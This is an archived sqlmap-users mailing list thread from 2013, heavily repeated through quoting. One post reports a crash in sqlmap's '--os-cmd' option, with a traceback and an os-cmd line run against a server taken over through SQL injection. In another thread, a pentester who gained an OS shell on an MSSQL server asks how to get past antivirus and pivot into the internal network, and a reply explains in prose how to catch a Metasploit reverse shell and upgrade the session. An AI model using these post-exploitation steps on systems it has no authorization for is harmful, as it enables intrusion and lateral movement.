On Sun, May 26, 2013 at 3:30 AM, Joe O'Hara <joe...@gm...> wrote:

> The error is as follows:
> os: Ubuntu 13.04
>
> sqlmap version: 1.0-dev
> Python version: 2.7.4
> Operating system: posix
> Command line: ./sqlmap.py -u
> ************************************************ --os-cmd echo ^<?xml
> version=1.0 encoding=utf-8 ?^> > myfile.xml
> Technique: None
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 89, in main
>     start()
>   File "/home/joe/sqlmap/lib/controller/controller.py", line 576, in start
>     action()
>   File "/home/joe/sqlmap/lib/controller/action.py", line 157, in action
>     conf.dbmsHandler.osCmd()
>   File "/home/joe/sqlmap/plugins/generic/takeover.py", line 60, in osCmd
>     self.runCmd(conf.osCmd)
>   File "/home/joe/sqlmap/lib/takeover/abstraction.py", line 84, in runCmd
>     output = self.evalCmd(cmd)
>   File "/home/joe/sqlmap/lib/takeover/abstraction.py", line 58, in evalCmd
>     retVal = self.webBackdoorRunCmd(cmd)
>   File "/home/joe/sqlmap/lib/takeover/web.py", line 75, in
> webBackdoorRunCmd
>     page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True,
> timeout=BACKDOOR_RUN_CMD_TIMEOUT)
>   File "/home/joe/sqlmap/lib/request/connect.py", line 260, in getPage
>     url, params = url.split("?")
> ValueError: too many values to unpack
>
>
>
> ------------------------------------------------------------------------------
> Try New Relic Now & We'll Send You this Cool Shirt
> New Relic is the only SaaS-based application performance monitoring service
> that delivers powerful full stack analytics. Optimize and monitor your
> browser, app, & servers with just a few lines of code. Try New Relic
> and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_may
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] SQLMAP Bug

[Joe O'H. <joe...@gm...>]

The error is as follows:
os: Ubuntu 13.04

sqlmap version: 1.0-dev
Python version: 2.7.4
Operating system: posix
Command line: ./sqlmap.py -u
************************************************ --os-cmd echo ^<?xml
version=1.0 encoding=utf-8 ?^> > myfile.xml
Technique: None
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 89, in main
    start()
  File "/home/joe/sqlmap/lib/controller/controller.py", line 576, in start
    action()
  File "/home/joe/sqlmap/lib/controller/action.py", line 157, in action
    conf.dbmsHandler.osCmd()
  File "/home/joe/sqlmap/plugins/generic/takeover.py", line 60, in osCmd
    self.runCmd(conf.osCmd)
  File "/home/joe/sqlmap/lib/takeover/abstraction.py", line 84, in runCmd
    output = self.evalCmd(cmd)
  File "/home/joe/sqlmap/lib/takeover/abstraction.py", line 58, in evalCmd
    retVal = self.webBackdoorRunCmd(cmd)
  File "/home/joe/sqlmap/lib/takeover/web.py", line 75, in webBackdoorRunCmd
    page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True,
timeout=BACKDOOR_RUN_CMD_TIMEOUT)
  File "/home/joe/sqlmap/lib/request/connect.py", line 260, in getPage
    url, params = url.split("?")
ValueError: too many values to unpack

Re: [sqlmap-users] Deploy&Create SSH/tunnel with compromised MSSQL server

[Brandon P. <bpe...@gm...>]

No it doesn't work that way.


On Sat, May 25, 2013 at 1:08 AM, Alok Kumar <alo...@gm...>wrote:

> Ya that's a good idea, thanks!
> but r u sure it will work even if MSSQL db has no direct internet
> connection? will it be able to route db telnet request to my metasploit
> system through vulnerable application?
>
>
> On Sat, May 25, 2013 at 11:33 AM, Brandon Perry <bpe...@gm...
> > wrote:
>
>> Open a multi/handler serving up a basic reverse shell in Metasploit and
>> telnet into it using the os-shell. Then upgrade the session with sessions
>> -u.
>>
>>
>> On Sat, May 25, 2013 at 12:55 AM, Alok Kumar <alo...@gm...>wrote:
>>
>>>  Hello friends,
>>> I desperately need your help in my post exploitation phase.
>>>
>>> After exploiting the sql injection(time-based) vulnerability using
>>> sqlmap, I got OS-Shell> of compromised database server, however I failed to
>>> inject meterpreter with an error stating that injection failed due to
>>> Antivirus..bla..bla..
>>>
>>> I didn't tried VNC yet, but my prediction is it may fail as well.
>>>
>>> Also my assumption is the compromised database configured to communicate
>>> with application server on LAN IP and has no public facing internet
>>> configuration, means no direct internet access.
>>>
>>> OS-Shell> response is very slow, it takes 4-8 hours to respond to simple
>>> command like "net user" :(
>>>
>>> Now in this situation can we deploy and create some tunnel to database,
>>> which is faster and give quick response to further probing such as scan the
>>> internal of their network?
>>>
>>> (Fyi, this is an ongoing authorized penetration test exercise)
>>>
>>>
>>> kindly HELP
>>>
>>>
>>> Regards,
>>> Alok
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Try New Relic Now & We'll Send You this Cool Shirt
>>> New Relic is the only SaaS-based application performance monitoring
>>> service
>>> that delivers powerful full stack analytics. Optimize and monitor your
>>> browser, app, & servers with just a few lines of code. Try New Relic
>>> and get this awesome Nerd Life shirt!
>>> http://p.sf.net/sfu/newrelic_d2d_may
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>
>


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] Deploy&Create SSH/tunnel with compromised MSSQL server

[Alok K. <alo...@gm...>]

Ya that's a good idea, thanks!
but r u sure it will work even if MSSQL db has no direct internet
connection? will it be able to route db telnet request to my metasploit
system through vulnerable application?


On Sat, May 25, 2013 at 11:33 AM, Brandon Perry
<bpe...@gm...>wrote:

> Open a multi/handler serving up a basic reverse shell in Metasploit and
> telnet into it using the os-shell. Then upgrade the session with sessions
> -u.
>
>
> On Sat, May 25, 2013 at 12:55 AM, Alok Kumar <alo...@gm...>wrote:
>
>> Hello friends,
>> I desperately need your help in my post exploitation phase.
>>
>> After exploiting the sql injection(time-based) vulnerability using
>> sqlmap, I got OS-Shell> of compromised database server, however I failed to
>> inject meterpreter with an error stating that injection failed due to
>> Antivirus..bla..bla..
>>
>> I didn't tried VNC yet, but my prediction is it may fail as well.
>>
>> Also my assumption is the compromised database configured to communicate
>> with application server on LAN IP and has no public facing internet
>> configuration, means no direct internet access.
>>
>> OS-Shell> response is very slow, it takes 4-8 hours to respond to simple
>> command like "net user" :(
>>
>> Now in this situation can we deploy and create some tunnel to database,
>> which is faster and give quick response to further probing such as scan the
>> internal of their network?
>>
>> (Fyi, this is an ongoing authorized penetration test exercise)
>>
>>
>> kindly HELP
>>
>>
>> Regards,
>> Alok
>>
>>
>> ------------------------------------------------------------------------------
>> Try New Relic Now & We'll Send You this Cool Shirt
>> New Relic is the only SaaS-based application performance monitoring
>> service
>> that delivers powerful full stack analytics. Optimize and monitor your
>> browser, app, & servers with just a few lines of code. Try New Relic
>> and get this awesome Nerd Life shirt!
>> http://p.sf.net/sfu/newrelic_d2d_may
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>

Re: [sqlmap-users] Deploy&Create SSH/tunnel with compromised MSSQL server

[Brandon P. <bpe...@gm...>]

Open a multi/handler serving up a basic reverse shell in Metasploit and
telnet into it using the os-shell. Then upgrade the session with sessions
-u.


On Sat, May 25, 2013 at 12:55 AM, Alok Kumar <alo...@gm...>wrote:

> Hello friends,
> I desperately need your help in my post exploitation phase.
>
> After exploiting the sql injection(time-based) vulnerability using sqlmap,
> I got OS-Shell> of compromised database server, however I failed to inject
> meterpreter with an error stating that injection failed due to
> Antivirus..bla..bla..
>
> I didn't tried VNC yet, but my prediction is it may fail as well.
>
> Also my assumption is the compromised database configured to communicate
> with application server on LAN IP and has no public facing internet
> configuration, means no direct internet access.
>
> OS-Shell> response is very slow, it takes 4-8 hours to respond to simple
> command like "net user" :(
>
> Now in this situation can we deploy and create some tunnel to database,
> which is faster and give quick response to further probing such as scan the
> internal of their network?
>
> (Fyi, this is an ongoing authorized penetration test exercise)
>
>
> kindly HELP
>
>
> Regards,
> Alok
>
>
> ------------------------------------------------------------------------------
> Try New Relic Now & We'll Send You this Cool Shirt
> New Relic is the only SaaS-based application performance monitoring service
> that delivers powerful full stack analytics. Optimize and monitor your
> browser, app, & servers with just a few lines of code. Try New Relic
> and get this awesome Nerd Life shirt! http://p.sf.net/sfu/newrelic_d2d_may
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

[sqlmap-users] Deploy&Create SSH/tunnel with compromised MSSQL server

[Alok K. <alo...@gm...>]

Hello friends,
I desperately need your help in my post exploitation phase.

After exploiting the sql injection(time-based) vulnerability using sqlmap,
I got OS-Shell> of compromised database server, however I failed to inject
meterpreter with an error stating that injection failed due to
Antivirus..bla..bla..

I didn't tried VNC yet, but my prediction is it may fail as well.

Also my assumption is the compromised database configured to communicate
with application server on LAN IP and has no public facing internet
configuration, means no direct internet access.

OS-Shell> response is very slow, it takes 4-8 hours to respond to simple
command like "net user" :(

Now in this situation can we deploy and create some tunnel to database,
which is faster and give quick response to further probing such as scan the
internal of their network?

(Fyi, this is an ongoing authorized penetration test exercise)


kindly HELP


Regards,
Alok